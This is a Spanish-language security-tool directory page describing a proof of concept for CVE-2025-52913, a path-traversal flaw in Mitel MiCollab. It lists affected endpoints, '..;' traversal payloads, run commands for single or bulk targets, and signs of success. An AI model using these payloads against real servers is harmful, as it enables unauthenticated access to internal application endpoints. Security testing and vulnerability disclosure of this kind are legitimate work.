Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-CVE-2025-52913 — Una prueba de concepto (PoC) para CVE-2025-52913, una vulnerabilidad de normalización de rutas que afecta a Mitel MiCollab. | Kitploit
Herramientas/GitHubGitHub/pgasus99/poc-cve-2025-52913
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

Una prueba de concepto (PoC) para CVE-2025-52913, una vulnerabilidad de normalización de rutas que afecta a Mitel MiCollab.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-52913 - Vulnerabilidad de Normalización de Rutas en MiCollab

📌 Descripción general

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-52913, una vulnerabilidad de normalización de rutas que afecta a Mitel MiCollab.

El problema permite a atacantes no autenticados evadir las restricciones de ruta previstas aprovechando secuencias de URL manipuladas como ..;, lo que conduce al acceso a endpoints internos de la aplicación.


⚠️ Impacto

La explotación exitosa puede permitir:

  • Acceso a endpoints internos y restringidos
  • Exposición de componentes sensibles de la aplicación
  • Posible divulgación de información

🎯 Endpoints Afectados

La vulnerabilidad puede activarse mediante las siguientes rutas:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 Payloads

Ejemplos de payloads de traversal:

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 Uso

1. Instalar dependencias

root@kitploit:~
pip install -r requirements.txt

2. Ejecutar contra un único objetivo

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. Ejecutar contra múltiples objetivos

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 Ejemplo

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 Detección

Un objetivo es probablemente vulnerable si:

  • El servidor responde con HTTP 200

  • La respuesta contiene:

    • Axis2
    • Axis2 Happiness Page
    • Salida válida de la aplicación desde endpoints internos

🛠️ Detalles Técnicos

La vulnerabilidad surge de una normalización incorrecta de rutas manipuladas que contienen ..;, lo que permite el traversal más allá del contexto de aplicación previsto.

Este comportamiento puede exponer servicios internos como:

  • Interfaz de servicios web Axis2
  • Endpoints internos de gestión de usuarios

👤 Descubrimiento

Descubierto por Dahmani Toumi


📚 Referencias

  • CVE: CVE-2025-52913
  • (Añada el aviso del proveedor o el enlace de NVD cuando esté disponible)

⚖️ Aviso Legal

Este proyecto está destinado únicamente a fines educativos y pruebas de seguridad autorizadas.

No utilice esta herramienta contra sistemas sin permiso explícito. El autor no es responsable de ningún uso indebido o daño.


Descargar herramienta